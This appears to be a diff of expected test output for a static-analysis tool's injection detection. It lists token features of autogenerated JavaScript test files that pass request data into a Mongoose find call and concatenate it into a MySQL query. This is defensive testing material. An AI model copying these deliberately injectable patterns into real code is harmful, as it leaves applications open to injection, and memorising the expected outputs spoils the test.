autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:3:13:14 | MyModel.find | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:3:13:14 | MyModel.find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:3:13:14 | MyModel.find | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:3:13:40 | MyModel ... id}` }) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:3:13:40 | MyModel ... id}` }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:3:13:40 | MyModel ... id}` }) | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:3:13:40 | MyModel ... id}` }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:3:13:40 | MyModel ... id}` }) | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:3:13:40 | exceptional return of MyModel ... id}` }) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:3:13:40 | exceptional return of MyModel ... id}` }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:3:13:40 | exceptional return of MyModel ... id}` }) | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:3:13:40 | exceptional return of MyModel ... id}` }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:3:13:40 | exceptional return of MyModel ... id}` }) | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:11:13:14 | find | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:11:13:14 | find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:11:13:14 | find | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:11:13:14 | find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:11:13:14 | find | fileImports | ./mongooseModel body-parser express | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:16:13:39 | { id: ` ... .id}` } | CalleeFlexibleAccessPath | MyModel.find | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:16:13:39 | { id: ` ... .id}` } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:16:13:39 | { id: ` ... .id}` } | calleeImports | ./mongooseModel | @@ -3284,6 +16002,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:16:13:39 | { id: ` ... .id}` } | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:16:13:39 | { id: ` ... .id}` } | fileImports | ./mongooseModel body-parser express | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:16:13:39 | { id: ` ... .id}` } | receiverName | MyModel | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:18:13:19 | id | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:18:13:19 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:18:13:19 | id | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:18:13:19 | id | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:18:13:19 | id | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:18:13:37 | id: `${req.body.id}` | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:18:13:37 | id: `${req.body.id}` | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:18:13:37 | id: `${req.body.id}` | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:18:13:37 | id: `${req.body.id}` | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:18:13:37 | id: `${req.body.id}` | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:18:13:37 | id: `${req.body.id}` | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:18:13:37 | id: `${req.body.id}` | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:18:13:37 | id: `${req.body.id}` | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:18:13:37 | id: `${req.body.id}` | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:18:13:37 | id: `${req.body.id}` | fileImports | ./mongooseModel body-parser express | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:22:13:37 | `${req.body.id}` | CalleeFlexibleAccessPath | MyModel.find | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:22:13:37 | `${req.body.id}` | InputAccessPathFromCallee | 0.id | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:22:13:37 | `${req.body.id}` | InputArgumentIndex | 0 | @@ -3294,18 +16027,126 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:22:13:37 | `${req.body.id}` | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:22:13:37 | `${req.body.id}` | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:22:13:37 | `${req.body.id}` | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:25:13:27 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:25:13:27 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:25:13:27 | req | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:25:13:27 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:25:13:27 | req | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:25:13:32 | req.body | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:25:13:32 | req.body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:25:13:32 | req.body | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:25:13:32 | req.body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:25:13:32 | req.body | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:25:13:35 | req.body.id | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:25:13:35 | req.body.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:25:13:35 | req.body.id | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:25:13:35 | req.body.id | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:25:13:35 | req.body.id | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:25:13:35 | req.body.id | stringConcatenatedWith | -endpoint- | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:29:13:32 | body | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:29:13:32 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:29:13:32 | body | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:29:13:32 | body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:29:13:32 | body | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:34:13:35 | id | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:34:13:35 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:34:13:35 | id | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:34:13:35 | id | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:34:13:35 | id | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:1:1:0 | this | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:1:1:0 | this | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:1:1:1 | pool | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:1:1:1 | pool | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:1:1:1 | pool | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:1:1:1 | require | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:1:1:1 | require | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:7:1:9 | app | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:7:1:9 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:7:1:9 | app | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:7:1:32 | app | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:7:1:32 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:7:1:32 | app | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:7:1:32 | app = r ... ess")() | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:7:1:32 | app = r ... ess")() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:7:1:32 | app = r ... ess")() | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:13:1:19 | require | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:13:1:19 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:13:1:19 | require | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:13:1:30 | exceptional return of require("express") | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:13:1:30 | exceptional return of require("express") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:13:1:30 | exceptional return of require("express") | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:13:1:30 | require("express") | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:13:1:30 | require("express") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:13:1:30 | require("express") | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:13:1:32 | exceptional return of require("express")() | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:13:1:32 | exceptional return of require("express")() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:13:1:32 | exceptional return of require("express")() | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:13:1:32 | require("express")() | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:13:1:32 | require("express")() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:13:1:32 | require("express")() | fileImports | express mysql | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:21:1:29 | "express" | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:21:1:29 | "express" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:21:1:29 | "express" | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:21:1:29 | "express" | contextFunctionInterfaces | handler(req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:21:1:29 | "express" | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:1:21:1:29 | "express" | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:2:7:2:11 | mysql | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:2:7:2:11 | mysql | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:2:7:2:11 | mysql | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:2:7:2:30 | mysql | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:2:7:2:30 | mysql | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:2:7:2:30 | mysql | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:2:7:2:30 | mysql = ... mysql') | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:2:7:2:30 | mysql = ... mysql') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:2:7:2:30 | mysql = ... mysql') | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:2:15:2:21 | require | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:2:15:2:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:2:15:2:21 | require | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:2:15:2:30 | exceptional return of require('mysql') | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:2:15:2:30 | exceptional return of require('mysql') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:2:15:2:30 | exceptional return of require('mysql') | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:2:15:2:30 | require('mysql') | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:2:15:2:30 | require('mysql') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:2:15:2:30 | require('mysql') | fileImports | express mysql | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:2:23:2:29 | 'mysql' | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:2:23:2:29 | 'mysql' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:2:23:2:29 | 'mysql' | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:2:23:2:29 | 'mysql' | contextFunctionInterfaces | handler(req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:2:23:2:29 | 'mysql' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:2:23:2:29 | 'mysql' | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:7:3:10 | pool | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:7:3:10 | pool | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:7:3:10 | pool | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:7:3:10 | pool | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:7:3:42 | pool | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:7:3:42 | pool | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:7:3:42 | pool | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:7:3:42 | pool = ... nfig()) | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:7:3:42 | pool = ... nfig()) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:7:3:42 | pool = ... nfig()) | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:14:3:18 | mysql | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:14:3:18 | mysql | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:14:3:18 | mysql | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:14:3:29 | mysql.createPool | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:14:3:29 | mysql.createPool | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:14:3:29 | mysql.createPool | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:14:3:42 | exceptional return of mysql.c ... nfig()) | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:14:3:42 | exceptional return of mysql.c ... nfig()) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:14:3:42 | exceptional return of mysql.c ... nfig()) | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:14:3:42 | mysql.c ... nfig()) | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:14:3:42 | mysql.c ... nfig()) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:14:3:42 | mysql.c ... nfig()) | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:20:3:29 | createPool | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:20:3:29 | createPool | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:20:3:29 | createPool | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:31:3:39 | getConfig | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:31:3:39 | getConfig | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:31:3:39 | getConfig | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:31:3:41 | exceptional return of getConfig() | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:31:3:41 | exceptional return of getConfig() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:31:3:41 | exceptional return of getConfig() | fileImports | express mysql | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:31:3:41 | getConfig() | CalleeFlexibleAccessPath | mysql.createPool | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:31:3:41 | getConfig() | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:31:3:41 | getConfig() | calleeImports | mysql | @@ -3313,6 +16154,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:31:3:41 | getConfig() | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:31:3:41 | getConfig() | fileImports | express mysql | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:3:31:3:41 | getConfig() | receiverName | mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:1:5:3 | app | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:1:5:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:1:5:3 | app | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:1:5:7 | app.get | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:1:5:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:1:5:7 | app.get | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:1:22:2 | app.get ... });\\n}) | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:1:22:2 | app.get ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:1:22:2 | app.get ... });\\n}) | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:1:22:2 | exceptional return of app.get ... });\\n}) | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:1:22:2 | exceptional return of app.get ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:1:22:2 | exceptional return of app.get ... });\\n}) | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:5:5:7 | get | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:5:5:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:5:5:7 | get | fileImports | express mysql | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:9:5:16 | "search" | CalleeFlexibleAccessPath | app.get | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:9:5:16 | "search" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:9:5:16 | "search" | calleeImports | express | @@ -3320,6 +16176,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:9:5:16 | "search" | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:9:5:16 | "search" | fileImports | express mysql | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:9:5:16 | "search" | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:19:5:18 | pool | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:19:5:18 | pool | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:19:5:18 | pool | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:19:5:18 | pool | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:19:5:18 | pool | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:19:5:18 | this | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:19:5:18 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:19:5:18 | this | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:19:5:18 | this | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:19:5:18 | this | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:19:5:19 | temp | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:19:5:19 | temp | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:19:5:19 | temp | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:19:5:19 | temp | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:19:5:19 | temp | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:19:22:1 | 'arguments' object of function handler | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:19:22:1 | 'arguments' object of function handler | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:19:22:1 | 'arguments' object of function handler | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:19:22:1 | 'arguments' object of function handler | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:19:22:1 | 'arguments' object of function handler | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:19:22:1 | exceptional return of function handler | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:19:22:1 | exceptional return of function handler | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:19:22:1 | exceptional return of function handler | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:19:22:1 | exceptional return of function handler | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:19:22:1 | 